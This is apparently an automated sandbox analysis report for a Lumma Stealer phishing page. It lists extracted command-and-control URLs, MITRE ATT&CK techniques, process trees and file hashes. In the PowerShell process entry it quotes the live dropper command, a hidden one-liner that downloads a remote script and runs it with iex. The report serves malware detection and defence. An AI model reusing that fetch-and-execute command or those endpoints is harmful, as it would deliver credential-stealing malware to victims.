lumma | hxxps://you-checked[.]com/cf/verify/6534229/check

Analysis

max time kernel
196s
max time network
185s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-01-2025 04:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://you-checked.com/cf/verify/6534229/check

Score

10^/10

lumma discovery execution phishing stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://ferrydero.com/gopros/verify.txt

Extracted

Family

lumma

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

https://healbewilk.cyou/api

Extracted

Family

lumma

https://healbewilk.cyou/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 3 IoCs

flow	pid	Process
43	2336	powershell.exe
45	2336	powershell.exe
50	2336	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2336	powershell.exe
2336	powershell.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing

Executes dropped EXE 1 IoCs

pid	Process
2680	jegule.exe

Loads dropped DLL 1 IoCs

pid	Process
2680	jegule.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
32	api.ipify.org
33	api.ipify.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jegule.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133806967211100098"	chrome.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2216	chrome.exe
2216	chrome.exe
2336	powershell.exe
2336	powershell.exe
2336	powershell.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2216	chrome.exe
2216	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe
Token: SeCreatePagefilePrivilege	2216	chrome.exe
Token: SeShutdownPrivilege	2216	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 4816	2216	chrome.exe	83
PID 2216 wrote to memory of 4816	2216	chrome.exe	83
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 1996	2216	chrome.exe	84
PID 2216 wrote to memory of 4800	2216	chrome.exe	85
PID 2216 wrote to memory of 4800	2216	chrome.exe	85
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86
PID 2216 wrote to memory of 864	2216	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://you-checked.com/cf/verify/6534229/check
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde2f6cc40,0x7ffde2f6cc4c,0x7ffde2f6cc58
  2⤵
  PID:4816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1884,i,15063595855845294776,17922745840965638035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1880 /prefetch:2
  2⤵
  PID:1996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,15063595855845294776,17922745840965638035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,15063595855845294776,17922745840965638035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2388 /prefetch:8
  2⤵
  PID:864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,15063595855845294776,17922745840965638035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:2696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,15063595855845294776,17922745840965638035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4100,i,15063595855845294776,17922745840965638035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:8
  2⤵
  PID:4852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=728,i,15063595855845294776,17922745840965638035,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4772

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -command $uR='https://ferrydero.com/gopros/verify.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
- C:\ProgramData\Extracto\jegule.exe
  "C:\ProgramData\Extracto\jegule.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Extracto\jegule.exe

Filesize
20KB

MD5
fa97a6f9d73a5df050e0db6acb82c478

SHA1
5776f50071359218699f90443a6dd51c31f5d639

SHA256
c7c7ced1b2fa62aa6c504b0ba04031dc804ee7a35b5d9a99df37fbf25a6cb86f

SHA512
68620298d6cec8e8d252963cfb65eaa4b78281d95b9f30a3a82756d83ee8c801794cdc39a12e2e68be60cc423db1b7ac57c1f2cfc5b02a8ca686bc634ef0d25e

Download Submit
C:\ProgramData\Extracto\wincr.dll

Filesize
683KB

MD5
e41e2b47fe05aa5155cb079c4118ccdc

SHA1
403b2653bfb04fa4bb151b10183e354e322b7b8e

SHA256
196696b311241febe7f706082bbce27ba0657c604f4fb54c83000d7454d537dd

SHA512
4ad49ee1a4a2b79e507f6bcfde9a525972c49523f2b17c8c98a8fcca1e47e05f3ea0c8d15038cf32f1e49cf639152cd2364c24e5c53eb1c8c366d830a67cee49

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
0c5ef32066ce56cf148ff0b37cc6ae2a

SHA1
f670f773ad07b5af1f3e6239391374c1d1dd2ec0

SHA256
728b5aa3abcb53e31918a52a57e2d305158fb0b74ce71b3994fa050bf72fcdfc

SHA512
8c6730f3ec1ca6576f346370058ae53c5ac9b641714fdee515c668932a314157526824f803d9eb15d682b829f0539ba9677eb68d8716c83b1e2a321665b22f05

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
e25b1a6238268c87398dfd6c3e6e8764

SHA1
984ade51ebd961c03e19ab171980b2634416b6a2

SHA256
59e3c6ce6e686698aeda0f22307fb99c3ca51c0dfce3f5677abb8a41e6d0b69b

SHA512
8df3a15d5ae1a58205f54a03e1d084aba165c9955265461b732e012c549388c421124d3f58312a978638a537bdfee9baac6875d19595f004f4833204e5a5e227

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
427b81772febdee019b1ecc09defdb86

SHA1
3f318f03a3fe4d568e83fab1a20889321caf5bb7

SHA256
9efbc5d66bd170fb96137087b168b3cddfc8df009e723a248cde5af4901e13f0

SHA512
83a692abc02dd3ca3cf271d71d5cf995285d8205b206313d25237581f6b6d79b9ae47c2c5d3942edf85cbe245a3c9923f420e7076f9920629bb9853543333eb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
682B

MD5
62f39aeabb73be41f5ad853094b65d12

SHA1
1f380dd0f997343397f6089d1ee156b8ddd9809c

SHA256
6eafbf4aca6ab567bcfa2985624be5d832ec9fd7af70c52c552e52fce1b9550c

SHA512
e09807f2288d25736bda207cad9d5ddfb3b172a9bc69f83cc14353e704120d73a3de7a7df24a754a62e9b701849ae5a245932dde8c230926233aee33384b2276

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a080517ac148b67e903b66c1bbfb200d

SHA1
a4c9e17ddf5fc1e9d076ca8b677f8496dd185a6a

SHA256
308cf31679c996bf1a2fa833a8c417cbb30e014ea95dfc5b73c19a34fc9123ed

SHA512
58a0d81c6c46f16f7f5eb6bdfb507dddcaef3a03d6ae351531ae91765d6fd8136b20cb021a7de4aba60640a120cd03ee500d10c5e81a863c968ced64a6366063

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
85c3c674b41b813ee579ecc6d1ad5c21

SHA1
08dd676f3d27f540e3624261dba7eef68d2dbb67

SHA256
2bc19327112dbfdd72f6a3e20567da7e27133bd23de7dfe4d59bcf2bc38e24f2

SHA512
bc50a87d9fb2c5ee21fa856317d5f126db92f18163f4511f1ce8dedaa7b586913a6f817c91fd6f63e69ac68788cd9491a8c1e320cb4cb83d01906b557bf22853

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1fd9cc9d1ebd0c7ec3d86b44a3e354d7

SHA1
4eab6f68e79b2b77afd9d3ae7f4592a17be29bff

SHA256
9346fc6e9bef5f0159dc377f866c2dc5b8a1750dadccd3371841f6a034c14e03

SHA512
45d75f5d2ab59a2a1fd905634ceaad95953a5109c5ce9b95ff22db5da4104179c9c04c34b826faf60502bd844099c8839bd04eb11b160f261a137f7df8e6272a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
cbf53f8854be927671f1860563f4d66c

SHA1
230de77a7be481288afc663db1ac0332f71048e2

SHA256
c1f50ca8d39cec3669430880f3c15d35b135f39dbfa51a3c46efed27999d76f3

SHA512
ce2285f6c0e9ef61cc7bb0dfc4c0f356ef6aeac1757fca02ece4eda1440eede7826468609ecf8a75fe93abcf5efc19c4697525974a04ea3bdd402a49c2f6a033

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
86005b904a31dac6e2c0ea304cfbb1af

SHA1
9e43cb5e26891b0e916d3a20e5f7299b60bc89cb

SHA256
4fb3bf21aa6a48a202f53686ef33b234be5e3a1a18a3b4e198bd3c053c6805fc

SHA512
ee8d5e4bc326f95e4606de2fe1643071b23266cb43e1898e7c5efa60b24a9e6caa1e6e9bfb30217627a9eedf18e9ddec416faefb73ce8ebc566b5a2baeffdc29

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
224d30a3ea816cdf7d9768c4b24acd2d

SHA1
93daf45e1cf072060ca7f3ceb15eae4ddf7e38b4

SHA256
b268687c8cfe3a251bb34e1102fe9c29ca69bb247d43083f84d00795b566f8ca

SHA512
878f94387ee2e235a7ebc5a6ac45b3decef58a2c6b31680ddad5d895b40d2ec4b77e0219afe4c505604d9227b3ef757c0b55577a85200a72882402e033aa7505

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
da55f88a1cef790ec7c49941b034bc30

SHA1
d2e856e2edf35c994a7ecf5f97e481d261343dcf

SHA256
4ab726e9a65abbd3df98b8a85d7de9dbc677c3ecbe383df48dcc3b26c20f2236

SHA512
aa508458f25aa0dfb6dbe7e42196f2ef167a1ee4c2300d8424f19be843c3fecb6c74c052ad17de2d49adb82159b807d8644a4531a5a4324aa8f3175c6741470f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
79d9d1dfc9d3c0a0312c16198180fcda

SHA1
801df8e1e44cc8f58a8bdea896b555ce3e8db189

SHA256
bd0bad6a252e0f01d0e13dcb05394b813d8e1abe99260071a531ce130b6fbfc7

SHA512
873451aa47725446d3ae58f05d4524f830551070334584db520abbc67cc094e4f95e8225839a8d5f02a3270c5e05d9c3f459103dd751287d8e88a7e373bb7bc2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c59fd833aa3b2159ae7e482e4745cc26

SHA1
068d52b1b0a805aca05750f3083d99325be977c4

SHA256
a567d6ee035584dabd2456c4f40ee1e233e4b43d997184556daecb5fb9469c33

SHA512
cc407096d22ef78348e48ac0cf19d4c0131dbd59f47da157325e355f23ff5d69fea0d0aa4bb1ae8fc610b647c18f1ee597ad3a90188d1fb4a92b04b463785838

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0d2539693a5599322ebfe4bdc64bbfda

SHA1
37ac720942201561f8e8ac58b37cbcb5f71d0ee5

SHA256
d4c9dbb8255b24aa4c411bb4c7be51d43da8f5d70a14d0c514aef3f2ecfb3376

SHA512
e2c1ad6bf9a5f3caaf860970b285237c4658a6edaed6c2d8eb07503fc454cd4689e7c60533e4767352e736ea61c0940340e8b1b462d77fe895b275a971043927

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
f2bba6e96cca17b81ec8c74ba88dea1d

SHA1
8d378e3f4037f2772489b1833c16c490ba118b2a

SHA256
494f065168b7fb2b47bfb99cc9940f26c1d759f9f895ea9b2ff52c4f1fe1afad

SHA512
b538b0a8b723bb800dec370ec013fcd0d68434c14e987840e875ce38e567d20375d4a74f8be2a8e85fd3f1e806ae78339a5447a4fc1780f165b3a7fc5dec3430

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
9453dcefbfabd2622656a685111b28d3

SHA1
c9984baf68e2d9ac3a72550a2635db72d53af83f

SHA256
f060581ac97da84c4987b7dce958955a99ea3568960f5bd9b2a7e9c664940a91

SHA512
3e1cfa1fefb62ee77fabad72124033ff49e0f9ef1b7a95f683bdf8c9a5a4cd4a48dddfad10ba53dd5f7684479e96eb470a2b43cf908ebbac82a45979bf82eec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkufd4nu.ugr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2336-61-0x00007FFDCEFC0000-0x00007FFDCFA81000-memory.dmp

Filesize
10.8MB

Download
memory/2336-90-0x00007FFDCEFC0000-0x00007FFDCFA81000-memory.dmp

Filesize
10.8MB

Download
memory/2336-73-0x00000221A5BC0000-0x00000221A5BCA000-memory.dmp

Filesize
40KB

Download
memory/2336-72-0x00000221A5BE0000-0x00000221A5BF2000-memory.dmp

Filesize
72KB

Download
memory/2336-71-0x00007FFDCEFC0000-0x00007FFDCFA81000-memory.dmp

Filesize
10.8MB

Download
memory/2336-69-0x00000221A6110000-0x00000221A68B6000-memory.dmp

Filesize
7.6MB

Download
memory/2336-62-0x00007FFDCEFC0000-0x00007FFDCFA81000-memory.dmp

Filesize
10.8MB

Download
memory/2336-53-0x00000221A5410000-0x00000221A5432000-memory.dmp

Filesize
136KB

Download
memory/2336-50-0x00007FFDCEFC3000-0x00007FFDCEFC5000-memory.dmp

Filesize
8KB

Download
memory/2680-96-0x0000000075300000-0x00000000753B2000-memory.dmp

Filesize
712KB

Download
memory/2680-95-0x0000000000570000-0x000000000057C000-memory.dmp

Filesize
48KB

Download
memory/2680-93-0x0000000002EF0000-0x0000000002F4B000-memory.dmp

Filesize
364KB

Download
memory/2680-92-0x0000000002EF0000-0x0000000002F4B000-memory.dmp

Filesize
364KB

Download